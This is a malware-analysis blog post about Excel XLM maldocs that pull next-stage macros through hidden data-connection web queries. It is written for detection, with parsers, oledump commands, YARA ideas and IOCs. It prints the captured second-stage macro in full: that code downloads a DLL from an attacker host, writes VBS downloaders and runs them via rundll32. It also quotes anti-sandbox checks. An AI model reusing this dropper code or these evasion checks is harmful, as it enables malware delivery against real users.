
Getting Sneakier: Hidden Sheets, Data Connections, and XLM Macros

Posted on 2020-03-18 by Amirreza Niakanlahiji and Pedram Amini

Introduction

In January of 2019, we published a blog post titled "Extracting 'Sneaky' Excel XLM Macros" that detailed a technique attackers had adopted for embedding malicious logic in a lesser-understood facet of Excel spreadsheets: Excel 4.0 macros, also known as XLM macros.

Over the past few weeks, we have observed a surge in maldocs leveraging XLM macros, a trend that other researchers have also noticed and analyzed. Examples include "A Safe Excel Sheet Not So Safe" written by Xavier Mertens, as well as "Excel 4.0 Macro MalSpam Campaigns" written by Diana Lopera.

In this post, we provide a detailed analysis of an interesting campaign that is tied to a variety of executable payloads, a subject matter we'll be covering in a future blog. As of the time of writing, detection rates for this class of attack are relatively low, and these samples happily bypass the internal GSuite and O365 protection mechanisms.

We'll dive into the analysis of two separate documents. The first was attached to an email sent to us directly by the threat actor in late February; its C2 infrastructure is now offline. The second was captured on March 17th and, in this case, the C2 servers are still active at the time of writing.

Document One: inv-27101.xls

sha256: a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af | InQuest Labs - InQuest.net | VirusTotal

Image removed.

 

Document Two: Invoice85005.xls

sha256: bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f | InQuest Labs - InQuest.net | VirusTotal

Image removed.

 

Analysis of Document One: inv-27101.xls

Depicted below is a graphic extracted from this malicious document lure. Embedding coercive text within an image is a common tactic today: it attempts to bypass string-based detection engines while socially engineering the target into activating the embedded logic. This document has one Excel sheet and one hidden macrosheet:

Image removed.

The macrosheet can be easily unhidden through the Microsoft Excel UI/UX, as seen here in this animation:

Image removed.

Once the target user enables the active content, an Auto_Open sequence is activated that pivots to the cell D49, the contents of which are shown here:

Image removed.

This embedded macro first checks a few conditions before executing its primary directive, exiting early if any of the following conditions are not met:

  • The cell containing GET.WORKSPACE(19) ensures a mouse is present.

  • The cell containing GET.WORKSPACE(42) ensures that the system is capable of playing sounds.

  • The cell containing GET.WORKSPACE(1) ensures that the environment is Windows.

These routines are anti-sandbox tactics. The actor wants to ensure that the sample is not being detonated by a behavioral analysis tool. To learn more about the GET.WORKSPACE() function, see Excel 4.0 Macro Functions Reference.
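To make these checks easier to spot during triage, here is a minimal Python sketch that scans formula text for GET.WORKSPACE calls and annotates the type numbers that appear in this post. The function name, the lookup table, and the sample formulas are our own illustrative choices, not part of any existing tool.

```python
import re

# Meanings of the GET.WORKSPACE type numbers that appear in this post.
WORKSPACE_CHECKS = {
    1: "environment name and version (e.g. Windows)",
    13: "usable workspace width, in points",
    14: "usable workspace height, in points",
    19: "mouse present",
    26: "user name",
    42: "sound capability",
}

GET_WORKSPACE = re.compile(r"GET\.WORKSPACE\((\d+)\)", re.IGNORECASE)


def describe_workspace_checks(formulas):
    """Return (formula, type_num, meaning) for each GET.WORKSPACE call found."""
    findings = []
    for formula in formulas:
        for match in GET_WORKSPACE.finditer(formula):
            type_num = int(match.group(1))
            meaning = WORKSPACE_CHECKS.get(type_num, "not covered here")
            findings.append((formula, type_num, meaning))
    return findings


if __name__ == "__main__":
    # Illustrative formulas only; the real cells are shown in the screenshots.
    sample = ["=IF(GET.WORKSPACE(19),,CLOSE(TRUE))", "=GET.WORKSPACE(42)"]
    for formula, type_num, meaning in describe_workspace_checks(sample):
        print(f"{type_num:>3}  {meaning:<40}  {formula}")
```

A cluster of these calls guarding a CLOSE() is a reasonable, though not conclusive, hint that a macrosheet is fingerprinting its environment.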

Assuming the conditions are met, the primary directive stored within the cell labeled 'asdf' is executed. Let's take a look at the cell 'asdf', depicted below:

Image removed.

This logic checks cell U113 of the first sheet every 2 seconds, searching for the string 'LOS'. The loop continues for as long as there is a match; otherwise, execution continues at cell I66, which is referenced by the label 'sfgdfsh'. The code in cells I66 through I69 copies cells U110-U113 of Sheet1 into cells I70-I73 of the macrosheet.

Image removed.

If you inspect cells U110 through U113 on Sheet1 without enabling the active content, you'll see that they are empty. This is the most interesting aspect of this campaign and, so far as we know, a novel technique: the maldoc uses a "web query" object to pull cell content from a remote URL. The web query sends a request to the remote server upon document activation and keeps sending requests every few seconds thereafter. The referenced URL (hxxps://pnxkntdl[.]xyz/KJSDBViad7) is visible in clear text when the document is opened in a hex viewer, for example:

Image removed.

To further analyze how the URL is triggered, we'll use BiffView to parse the Excel document. If you search for the byte sequence '68 74 74 70' ("http") you'll find that the URL lives within a BIFF DCONN object. This object triggers the web query; see the relevant flags highlighted in the depiction below, which aligns the BIFF record with the relevant documentation:

Image removed.
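The same lookup can be scripted. The sketch below walks the records of an already-extracted Workbook stream, where each record is a 2-byte type, a 2-byte length, and then the payload, and pulls URL-like strings out of any DCONN (0x0876) record. It assumes the stream has been carved out of the OLE container beforehand and that the URL is stored as single-byte characters, as in this sample; the function names are our own.

```python
import re
import struct

DCONN = 0x0876  # BIFF record type: Data Connection

# Printable ASCII run starting with http:// or https://
URL_PATTERN = re.compile(rb"https?://[\x21-\x7e]+")


def iter_biff_records(stream):
    """Yield (offset, record_type, payload) for each record in a Workbook stream."""
    offset = 0
    while offset + 4 <= len(stream):
        record_type, size = struct.unpack_from("<HH", stream, offset)
        payload = stream[offset + 4 : offset + 4 + size]
        yield offset, record_type, payload
        offset += 4 + size


def find_dconn_urls(stream):
    """Return URL-like ASCII strings found inside DCONN records."""
    urls = []
    for _offset, record_type, payload in iter_biff_records(stream):
        if record_type == DCONN:
            urls.extend(m.group().decode("ascii") for m in URL_PATTERN.finditer(payload))
    return urls
```

URLs stored as two-byte characters would be missed by this pattern, so an empty result does not rule out a web query.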

The data returned from the remote URL is an XHTML (XML) document.

Image removed.

The web query content is enclosed within the <pre> element of that document:

Image removed.

The web query requests and responses are sent over an encrypted channel (HTTPS). To inspect the communications between Excel and the remote site, we use mitmproxy. By default, mitmproxy listens on 127.0.0.1:8080, so we change the system proxy setting to redirect all traffic through 127.0.0.1:8080:

Image removed.

The following content was returned from the remote URL, when the web query was executed in our lab:

<html>
<head><base href="/lander/excel4_1581586732/index.html">
<link rel="stylesheet" href="resource://content-accessible/plaintext.css">
</head>
<body>
<pre>
=CLOSE(FALSE)
=CLOSE(FALSE)
=CLOSE(FALSE)
=CLOSE(FALSE)"</pre>
</body>
</html>

The content of the <pre> element is copied to cells U110 through U113. Because the resulting content of U113 contains the substring 'LOS', the macro loops and checks again two seconds later. This retrieved payload is completely benign. So what's going on here? This is good operational security on the part of the actor. The remote server has not deemed us worthy of receiving the next stage of this malware. Perhaps the restriction is regional, perhaps it is something else. Luckily, we obtained another document.
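To make the loop condition concrete, here is a minimal Python sketch that pulls the lines out of the <pre> element of a captured response and tests each one for the 'LOS' marker. It uses only the standard library; the class and function names are ours, and it does not model how Excel itself maps the response onto cells.

```python
from html.parser import HTMLParser


class PreExtractor(HTMLParser):
    """Collect the text that appears inside <pre> elements."""

    def __init__(self):
        super().__init__()
        self.in_pre = False
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag == "pre":
            self.in_pre = True

    def handle_endtag(self, tag):
        if tag == "pre":
            self.in_pre = False

    def handle_data(self, data):
        if self.in_pre:
            self.chunks.append(data)


def pre_lines(html_text):
    """Return the non-empty lines found inside <pre>, stripped of whitespace."""
    parser = PreExtractor()
    parser.feed(html_text)
    parser.close()
    text = "".join(parser.chunks)
    return [line.strip() for line in text.splitlines() if line.strip()]


def keeps_polling(cell_value):
    """Mirror the macro's test: the loop continues while 'LOS' is present."""
    return "LOS" in cell_value
```

Run against the decoy response above, every extracted line is a CLOSE(FALSE) call, so keeps_polling() is true for each of them and the macro never advances.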

Analysis of Document Two: Invoice85005.xls

Similar to the previous sample, this one contains an Excel sheet and a "very" hidden macrosheet. Very hidden macrosheets cannot be revealed via a simple UI/UX toggle; they must be hex edited to become visible within the native Excel application. See our previous blog for more information. Again, a graphical lure with coercive text is used to entice the user into activating the embedded logic:

Image removed.

To unhide the macrosheet, we use Hexinator to change the visibility of the macrosheet manually. We know from previous research that the records for hidden and very hidden macrosheets start with the patterns "85 00 ?? ?? ?? ?? ?? ?? 01 01" and "85 00 ?? ?? ?? ?? ?? ?? 02 01" respectively. To unhide these sheets, we just need to set the ninth byte to zero, as shown here in an animation:

Image removed.
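The same patch can be applied programmatically. The following Python sketch searches raw file bytes for the two patterns quoted above and zeroes the ninth byte of each match. It is a byte-level approximation of the manual hex edit rather than a real BIFF parser, so the pattern can match unrelated data; treat it as a starting point, work on a copy of the sample, and note that the function name is hypothetical.

```python
import re

# 85 00 = BOUNDSHEET record type, then six bytes we do not care about,
# then the visibility byte (01 hidden, 02 very hidden) and 01 for a macrosheet.
HIDDEN_MACROSHEET = re.compile(rb"\x85\x00.{6}[\x01\x02]\x01", re.DOTALL)


def unhide_macrosheets(data):
    """Return (patched_bytes, offsets) with the visibility byte of each match zeroed."""
    patched = bytearray(data)
    offsets = []
    for match in HIDDEN_MACROSHEET.finditer(data):
        visibility_offset = match.start() + 8  # ninth byte of the record
        patched[visibility_offset] = 0x00
        offsets.append(visibility_offset)
    return bytes(patched), offsets
```

The returned offsets make it easy to confirm each hit in a hex viewer before trusting the patched copy.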

Again, the macro checks a few conditions:

=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=GET.WORKSPACE(13)
=GET.WORKSPACE(14)
=IF(H24<770, CLOSE(FALSE),)
=IF(H25<381, CLOSE(FALSE),)
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ON.TIME(NOW()+"00:00:02", "agawf23f"),CLOSE(TRUE))
=RETURN()

It also re-hides the macrosheet, setting it back to "very" hidden:

=WORKBOOK.HIDE("0TQ1ByZPP5", TRUE)

We can easily patch this by changing TRUE to FALSE, which leaves the sheet hidden rather than "very" hidden.

It then jumps to U33 (agawf23f label):

=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "rstegerg3"))
=RETURN()
=IF(ISNUMBER(SEARCH("s",Sheet1!S70)), GOTO(P54), ON.TIME(NOW()+"00:00:02", "agawf23f"))
=RETURN()

This file also contains a web query object. The remote URL is seen below (hxxps://tdvomds[.]pw/12341324rfefv):

Image removed.

The web query will populate a few cells in Sheet1 if it can successfully connect to the remote URL. The macro above copies these cells from Sheet1 into the macrosheet and then executes them.

Again, we use mitmproxy to capture the web query response. Another approach is to modify the macro, before enabling active content, so that the second-level macro is never executed. However, we are also interested in capturing the HTTP response.

Image removed.

The HTTP response contains an XHTML document, and this time, we are worthy of receiving the next-stage payload:

<html>
<head><base href="/lander/df3f1f14f134f314f/index.html">
<link rel="stylesheet" href="resource://content-accessible/plaintext.css">
</head>
<body>
<pre>
="https://tdvomds.pw/fef23f23f"<br>
=GET.WORKSPACE(26)<br>
="C:\Users\"&R[-1]C&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"<br>
="C:\Users\"&R[-2]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(100,999)&".vbs"<br>
="C:\Users\"&R[-3]C&"\AppData\Local\Temp\"&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&RANDBETWEEN(1000,9999)&".vbs"<br>
=IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))), GOTO(R[2]C),)<br>
=IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))), GOTO(R[7]C),)<br>
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-7]C,R[-5]C,0,0)<br>
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",""&R[-7]C&",DllRegisterServer",0,5)<br>
=CLOSE(FALSE)<br>
=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>
=LEFT(CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122))&CHAR(RANDBETWEEN(97,122)), RANDBETWEEN(4, 8))<br>
=FOPEN(R[-10]C,3)<br>
=FWRITELN(R[-1]C,"Dim "&R[-3]C&", "&R[-2]C&"")<br>
=FWRITELN(R[-2]C,"Set "&R[-4]C&" = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")<br>
=FWRITELN(R[-3]C,""&R[-5]C&".setOption(2) = 13056")<br>
=FWRITELN(R[-4]C,""&R[-6]C&".Open ""GET"", """&R[-17]C&""", False")<br>
=FWRITELN(R[-5]C,""&R[-7]C&".setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")<br>
=FWRITELN(R[-6]C,""&R[-8]C&".Send")<br>
=FWRITELN(R[-7]C,"If "&R[-9]C&".Status = 200 Then")<br>
=FWRITELN(R[-8]C,"Set "&R[-9]C&" = CreateObject(""ADODB.Stream"")")<br>
=FWRITELN(R[-9]C,""&R[-10]C&".Open")<br>
=FWRITELN(R[-10]C,""&R[-11]C&".Type = 1")<br>
=FWRITELN(R[-11]C,""&R[-12]C&".Write "&R[-13]C&".ResponseBody")<br>
=FWRITELN(R[-12]C,""&R[-13]C&".SaveToFile """&R[-23]C&""", 2")<br>
=FWRITELN(R[-13]C,""&R[-14]C&".Close")<br>
=FWRITELN(R[-14]C,"End If")<br>
=FCLOSE(R[-15]C)<br>
=EXEC("explorer.exe "&R[-26]C&"")<br>
=WAIT(NOW()+"00:00:05")<br>
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2)<br>
=FOPEN(R[-28]C,3)<br>
=FWRITELN(R[-1]C,"Set obj = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")<br>
=FWRITELN(R[-2]C,"obj.Document.Application.ShellExecute ""rundll32.exe"","" "&R[-32]C&",DllRegisterServer"",""C:\Windows\System32"",Null,0")<br>
=FCLOSE(R[-3]C)<br>
=EXEC("explorer.exe "&R[-32]C&"")<br>
=FILE.DELETE(R[-34]C)<br>
=CLOSE(FALSE)<br>
=RETURN()<br>
</pre>
</body>
</html>

 

The content of the "<pre>" element from the XHTML document is written to the sheet and executed as the next stage:

Image removed.
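The next-stage macro leans heavily on relative references such as R[-7]C, which are tedious to follow by eye. As a reading aid, this minimal Python sketch maps each line of the payload to the lines its same-column references point at. The function name is ours, and it assumes the lines land in consecutive cells of a single column.

```python
import re

# Matches same-column relative references such as R[-7]C or R[2]C,
# and skips references that also carry a column offset (R[1]C[2]).
RELATIVE_REF = re.compile(r"R\[(-?\d+)\]C(?!\[)")


def resolve_relative_refs(lines):
    """Map each line index to the list of line indexes its R[n]C references target."""
    resolved = {}
    for index, formula in enumerate(lines):
        targets = [index + int(m.group(1)) for m in RELATIVE_REF.finditer(formula)]
        if targets:
            resolved[index] = targets
    return resolved


if __name__ == "__main__":
    # First three lines of the payload above (URL defanged here).
    payload = [
        '="hxxps://tdvomds[.]pw/fef23f23f"',
        "=GET.WORKSPACE(26)",
        r'="C:\Users\"&R[-1]C&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"',
    ]
    print(resolve_relative_refs(payload))  # {2: [1]}
```

Applied to the full payload, the eighth line (the URLDownloadToFileA call) resolves R[-7]C to the first line, the download URL, and R[-5]C to the third, the .tmp.cvr path under the user's Temp directory.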

In this particular case, the pivot macro downloads a DLL file from hxxps://tdvomds[.]pw/fef23f23f (acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd; warning, actual sample) and executes rundll32 to call its DllRegisterServer function to register/execute it. The logic within the DLL communicates with the following C&C servers:

  • hxxps://aquolepp[.]pw/milagrecf.php

  • hxxps://dhteijwrb[.]host/milagrecf.php

Image removed.

Detection and Mitigation

Optical Character Recognition (OCR)

A solid generic approach to detect this and many similar malicious document lures is to carve out the embedded image and then extract the semantic content via OCR. Within the XLS/BIFFv8 format, records have a maximum size of 8,228 bytes. If the data is larger than what can fit in a single record, it must be split into chunks. The first chunk is put in the first record, and the remaining chunks are placed in subsequent CONTINUE (3Ch) records. To successfully extract images from XLS files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we've extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our GitHub repository (lines 570 to 603):

https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592
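To illustrate the idea of stripping CONTINUE headers, here is a minimal Python sketch that walks a Workbook stream and appends each CONTINUE (0x3C) payload to the record that precedes it. This is not the code from the patched plugin; it is plain concatenation under the assumption that the stream has already been extracted from the OLE container, and the function names are ours.

```python
import struct

CONTINUE = 0x003C  # BIFF record type used for overflow data


def iter_biff_records(stream):
    """Yield (record_type, payload) for each record in a Workbook stream."""
    offset = 0
    while offset + 4 <= len(stream):
        record_type, size = struct.unpack_from("<HH", stream, offset)
        yield record_type, stream[offset + 4 : offset + 4 + size]
        offset += 4 + size


def merge_continue_records(stream):
    """Return [(record_type, data)] with CONTINUE payloads joined to their parent."""
    merged = []
    for record_type, payload in iter_biff_records(stream):
        if record_type == CONTINUE and merged:
            parent_type, parent_data = merged[-1]
            merged[-1] = (parent_type, parent_data + payload)
        else:
            merged.append((record_type, payload))
    return merged
```

Once the chunks are joined, the 4-byte record headers that would otherwise corrupt a carved image are gone, and the blob can be searched for image signatures before being handed to OCR.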

Suspicious Attributes

Didier Stevens' oledump is a de facto standard tool in the arsenal of a maldoc analyst. The same BIFF plugin that we modified above to extract images can also filter for the DCONN record that both documents use to retrieve a next-stage pivot:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876"
  1:      4096 '\x05DocumentSummaryInformation'
  2:       240 '\x05SummaryInformation'
  3:    101088 'Workbook'
               Plugin: BIFF plugin
                 0876    135 DCONN : Data Connection

By additionally specifying the -s option to dump record contents as strings, one can expose the embedded URL as well:

$ oledump.py -p plugin_biff sample00/inv-27101.xls --pluginoptions "-o 876 -s"
  1:      4096 '\x05DocumentSummaryInformation'
  2:       240 '\x05SummaryInformation'
  3:    101088 'Workbook'
               Plugin: BIFF plugin
                 0876    135 DCONN : Data Connection
                  ASCII:
                   Connection
                   hxxps://pnxkntdl[.]xyz/KJSDBViad7
                   Sheet1!DSKVJBdsj2

We've written and open-sourced a generic YARA hunting rule that looks for Microsoft Excel documents that contain a DCONN record and a URL. To increase the detection accuracy, that rule can be combined with a second one that checks for the existence of hidden and "very" hidden macro sheets.

The samples above are all available for research and download via our open data portal https://labs.inquest.net.

IOCs

  • a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af
  • acc5fe0088037ddc055f9286380c56583effa1186afe9d08caea3e197b2643fd
  • bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f
  • hxxps://aquolepp[.]pw/milagrecf.php
  • hxxps://dhteijwrb[.]host/milagrecf.php
  • hxxps://pnxkntdl[.]xyz/KJSDBViad7
  • hxxps://tdvomds[.]pw/12341324rfefv
  • hxxps://tdvomds[.]pw/fef23f23f
  • aquolepp[.]pw
  • dhteijwrb[.]host
  • pnxkntdl[.]xyz
  • tdvomds[.]pw